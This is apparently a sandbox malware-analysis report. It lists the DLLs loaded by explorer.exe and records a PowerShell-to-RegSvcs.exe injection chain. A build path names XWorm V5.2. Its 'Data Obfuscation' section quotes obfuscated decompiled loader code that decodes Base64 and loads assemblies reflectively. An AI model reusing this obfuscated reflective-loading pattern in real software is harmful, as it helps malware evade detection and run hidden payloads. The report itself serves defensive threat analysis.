Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ninput.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ninput.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cldapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: fltlib.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: thumbcache.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.ui.fileexplorer.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: uiribbon.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryclient.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: structuredquery.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: networkexplorer.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ehstorshell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cscui.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: provsvc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\DLL\DLL\obj\Debug\DLL.pdb source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2269118993.00000000068D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2159298688.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\DLL\DLL\obj\Debug\DLL.pdb" source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2269118993.00000000068D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2159298688.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.GkEAxd3nJ5T2No6D7GAPyTu9H2RCHhovmhce8vUtvQRZwS3Llj8PT6QyxoB8ejmDziCHqIJETc8,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._0DtSY0DAdvftfFE2pUuSLnTfHqIJzYq6DkKj7o2H1UhyfuKOT9OoONpBct4AEPnNiLvJwXthHl1,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._6rmQnBxYz9wFjXeTkpWUZeLOu39HgSUqZd71j1za1gv5xaKy4Tw5vv0iULTi38ZgN6lxg4rgfwl,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.hQAzsDTmejtRzFTAGYZ9JLeR7bLH9yKFQ8A2gM6qfonXx3k8I99ygySzYyrHqAscPInDM6HYvbS,UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.xRBnfzrwWduwbc5XTg9GoORqm0jrxu8hsNXppUjoIbTyMyOoWfQiJYASUrhx9r5waTu9nCfcEhqJO()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[2],UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.JF9XD3PKLzllq7mNRKeF2ZEh4ezaBNAJbPZaWmOdDth4i0epPbsZqo1dmRi2God1jSSCOTuXb9M1p(Convert.FromBase64String(WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.GkEAxd3nJ5T2No6D7GAPyTu9H2RCHhovmhce8vUtvQRZwS3Llj8PT6QyxoB8ejmDziCHqIJETc8,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._0DtSY0DAdvftfFE2pUuSLnTfHqIJzYq6DkKj7o2H1UhyfuKOT9OoONpBct4AEPnNiLvJwXthHl1,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._6rmQnBxYz9wFjXeTkpWUZeLOu39HgSUqZd71j1za1gv5xaKy4Tw5vv0iULTi38ZgN6lxg4rgfwl,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.hQAzsDTmejtRzFTAGYZ9JLeR7bLH9yKFQ8A2gM6qfonXx3k8I99ygySzYyrHqAscPInDM6HYvbS,UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.xRBnfzrwWduwbc5XTg9GoORqm0jrxu8hsNXppUjoIbTyMyOoWfQiJYASUrhx9r5waTu9nCfcEhqJO()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[2],UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.JF9XD3PKLzllq7mNRKeF2ZEh4ezaBNAJbPZaWmOdDth4i0epPbsZqo1dmRi2God1jSSCOTuXb9M1p(Convert.FromBase64String(WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA
Source: 2.2.RegSvcs.exe.68d0000.3.raw.unpack, -Module-.cs .Net Code: _200E_202A_200E_206A_200B_202D_200E_202E_206C_206E_202A_200C_202E_206A_206A_202A_206A_206E_202C_200C_200E_202E_206A_200D_206E_200F_200E_206A_200D_206A_206B_202A_200E_202C_206F_202A_200C_202E_206E_202E System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B895B71 push ebp; retf 0_2_00007FFD9B895B72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F68080 push eax; iretd 2_2_00F68081
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F64CC8 pushad ; retf 2_2_00F64CD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063857D1 push es; ret 2_2_0638581C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063857D1 push es; ret 2_2_0638585C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063857C5 push es; ret 2_2_063857D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385ABD push es; ret 2_2_06385AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638581D push es; ret 2_2_0638585C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385869 push es; ret 2_2_063858B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638585D push es; ret 2_2_06385868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063858B5 push es; ret 2_2_063858F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063858F5 push es; ret 2_2_06385900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385901 push es; ret 2_2_0638594C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385969 push es; ret 2_2_0638598C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638598D push es; ret 2_2_06385998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063859D5 push es; ret 2_2_063859E4
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, jlP9ZmdwEcSal0DicgRXsFBAsRfalWtK8ACjZN20FmtLoweURb4IYXHMKD2jaT0u384K7iAfr5Cnm.cs High entropy of concatenated method names: '_3TNqZ5hEQVdooCaFVGMhOACTkYaCnTtbNyPGedVllTTfJY1ngUvGia8lhIVPmVUfboypRhwske82g', '_9hHmMsNWAQ6pax4hFZSp7KQG0rewoH7osRvhlI61xGEa9wmvjJneedEBnJlIm8ZEnxTWhRNJPkX6Y', '_49h5GNrcmqMaLuCg35WCTCs0h7BKuHAJaBowmRkClgoGOAsQ5inXYS1I0M7Z4aMeT3m9F31FvkW4S', 'PaOgG4FwzNenoLAMiHTHwPqA01MCJnbz4LPDBsbvSv1JUtf62uk5cC2FEJF1ahKJztdhgk', 'eyvfhsKHdxCVDDLO16w9bGJuDfMJixaw3yryvgfDvZpwSeF25JUC5FWDVzeVdYdoClck1f', 'J8aYoV2Df2dibOrCy3jWkKuxTQGwmadjsTkX0of9qc6qZW1dbylXmhbywydmt9LWAvlhFE', 'RQjJNYKDaRYNkmSSONuq1KvQn8xVeEqpZ43P9vqgNRXMzA99C74pQ7u867FKwVkSrz512z', 'Kr3d4jpdx7Aj5Es33qJdyZ5zLAZ6Oqexmh8VHGcQerW9335ONRoGZWlPv97IHMf5QLBSso', 'NHGZCbXPEwk9PdNJ2mCxrW7xUVF0RMDcuQdhPHTWzD89zg7tMv21UaWUF3nSJoDCbShLB8', 'URJnOTwGHUXQHGoqlnefuWqngz1MSskFe5rCHVNBGx1XVNP7QkTB4aFbYXZsWy4Hcgtyg7'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.cs High entropy of concatenated method names: 'GzuVwKUZhkX5MaCXS8tELiub2rzA1ABgbXvI4', 'oXpRvTFzCDMB9YdUHEyjFlV0N0YfeW9OJukeK', 'sh0DBD1NjSGAqZVBWAtzcy7TbplyMhoGUfRdG', 'MPt9bvo6JSjfeajadh10xlBrVCyhXGmiVK0rc'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, 0mxMqJmDRkOT353B3lVUMBD9Gejx6UE7bcw8cMUdm3.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'vBcnqg8Bxc612p2B1u3aTcQIPqiV5yrAPbgFT', 'kTfYaHyir2gb88jHa1xDDJOquMyuUmtAsRHRV', 'XxvYgezFFU8AxmQlcN8rTw2L9iLIPa6bPfCOZ', 'MvQTtw3McXFYFf0jea0HcJrIp99lPddWKFt98'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs High entropy of concatenated method names: 'uLcpjPuRlAYcVXjFYFmtEmE6IG3WW1Mtzr0RIFk9A9EyQrTvzKXXIVg2Kl9aPa4ZUwxDazhSAPcV9OBgEpQgQkmuIDh4', 'YKbSLHwMqgcS2pKolhOEHj3xgyFveKjEKCcidxigp4U5yTh4YfVyGzBJwlJcnpP19L9VroiHmlyJuG3idLBl3mCSn6Mm', 'zp4H0yQ0UehqO8XjWJBobcRnUXHtBNNdOJraqUqF18ZXk1TLUu8ITK9oxZPMDksn0W1Pa1Zafu97BPz21DtkMiy8OqlZ', 'acNGsDNjWVethdtOAHfS5bGCQjlG6rRtvqD0T5njuLJ25Dych7HkSrtJugHPYU1sEidvPQu9DNCndDlA1BwGcgqQOkza', 'EYijaGNCTZA5ssmfCphcWBaQGPjJhnvrfOYStXrbSHqI8vBOIvDeyI1zMKU0GLeIXfA35yHnFGzkvaEC5O96miFuyOQc', 'U97RvjaNCYtJiiNUnqYFKh9zn8xByBKWBrFUlgNNn3Y9kt6515ldQ6O97fXLCplKOYUDnKrYZHyKp20hGPYqLPGP43to', 'R5jVmcwmbdTygVF5mseYL7gR5WlhWpIX0SdRUW8f8j2wtWOjloLyaqtkDxKHgIKQPDNnccnKif6EDZ9Yo6kg1mpXNGdk', 'Qg4y4yWaLZe8ShxzIYTJF2jveZABfiLw14cUW2R4nubmT4B60JE6aFHCnRFHd6P1uknuuQS91W4dkE081WxvGjwhal6H', '_5Dw5lOtBWWVVZmthJsMhPC9cUzM5iN8pVJpzSBUee0S2ugQkSBULaRMjDDzaJSKNWwNUaDj8vvXM5hobP13i5jQnjnBo', 'C6Cvo3FCCkFc54Z203lOyD77mYeTf2u9XT2Fg9R2Ovlu8bqQgixOWFkdCS1Rv8ce5gNSQhYPH0Rte8KRxk0sprhtBDOD'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, KqM7OHZ0szpXMKUjIeoOth6ym1BTJiUrVDaPclVtZntCve6UTLSqTCZXaNVMStUq6wiimQow3L7sbJOInc0XhfKzEm5y.cs High entropy of concatenated method names: 'vlT8dwXrYPa88X2PCSTl1MzL1hOXuK3SZzQ1IazokTftenOcdNLZ16Tqdw7yu5ANElYZlWxgwhbSblLDgcDV4JQrQgpG', 'Yri9DO8KJSBPdGKWv6rruFnfPHpprBjidMFUJ', 'ihN7Vn5g9RpbzGgZUePo8B2niWfMdhDAfds47', 'dvL73CjsvtRpTg2h7knB3tzBhCT55MED4VzHf', 'wdniSU5EpAhXrItpr3nizrrDSwO3uC8vl3Kj9'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, HSVnbciCbEspA5qeJHR9bJSsZnPWuo0GrZXu7MR1gBQLksXwzFXzWWgcApgGUgNKiWg0pwlEuNF.cs High entropy of concatenated method names: '_2q4wpPRfaVhr0exnXH7y891APAO7HbKET96GKYxGsofSr6nSYQvElSnVQzd4FzDKrH30YbalY8L', 'aWKN8JgTw7OsnLqijS1G2FSf5lKyN1BzTceUS7AusrlZE4LOpgaXcu1Wuwzk1u0fNisdvfs1qDN', 'FJHVAMux3eOse32NPNrYghB0J9OilS0b1VXxCJDJh6FXmI8aBAEjaNpxaC2kopUIxwHOIGv955L', 'jGfRxrKXNpeTM8YO7QPoRJmjQ2fPzxvsBjNLD', 'kZ9PmGZma9rdlqmPKpJGfpPr2H3r8JkUX7S1I', 'AQhlQ1kzIc9Ef2keyCUXapmb3OGi6FTBB2Kva', 'bwp4xqBSAhOIzAidlh3oJJvRivoyrO2AeizFi', 't4NvZMrcVrH5QwGjkdYgS8T6KKd876mvUUikN', 'THXyLh0AdRiaDLkYYQVt4gIf6aGSl2TGIZ0Hv', 'AT1vYmitOvIzOWbQZzZiuTU12J3PiZKXYnxiA'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs High entropy of concatenated method names: 'QVEVDhViI9Msxtf3rvGnQiMgFCItcS0p5D6Z1BTCpo5f6Fde2LisyMtpWmRG', 'N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi', '_1lKSstulGZhXYINkaQd9Asdnrsvcni39pRvUFDpwycuW4xpMqX4hS77iXc6K', 'PNFvO7d1Mi2IWzxMtx1zqm34FyxGrUWwyLxwiGmyaWGVEehy9D6hxvHM1wdE', 'NzfmYhAUGceMKW0mjLzHPddnDgqRRmTH0j9pDfOYWD2DRetXvurMj6Mnbf7d', 'xt4khGVNTHDEWpsI1gYgYvoJk7rms4Vqp4A1OuJJVHK8d5oZr1gtEs3Mjthp', 'zmLy2I6ntM2aqhLCLWxvECHOzvQIBQMbMZRkop6htT9CZiCpf1AwaOdoxGnL', 'lGU48PAY736gsQX2viMog6499aYSQjosLWQRnL6JHFF67P95LEO7pVqTOpjP', 'tWcbDFC14xGh0OYdfNzCiUkAdgC4GkZEk3fcvvyC27fsgUEboKucKM0JQCNsUm0dx4Ht2O9GEH5iHMX42Oi6Tya6c44Z', '_74dfJY6UAxv3WrBFrcQeFUKJoMxCX21o0QCYxD66ZQnhM3Ecq9rhBxcB8PaVyrqjY8AQ0yV0nFGhMbW1o118n5tdEMW0'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.cs High entropy of concatenated method names: 'MqoWDQphzr8fvnkIH9zEEDcDy7t0zalckB2FahnIxepzgPAMJUZvXj5AyxTxgsTptxlaeKuQhZNQ652tx2KfrWb4jegt', '_39p79IiNTKU0DvuMDijBA51wmgQCy8uNaqsmM', 'VTi9WoIpssJGUPzXMbuMCGF0hZYIeuMphrb9F', 'iVslLiCsMBZl1LzuhzFMYBpuQXVYU9MiwNoac', 'Tmceex3fvKsJkAkUdbAOatlNKDEvt7aWE2OZV'
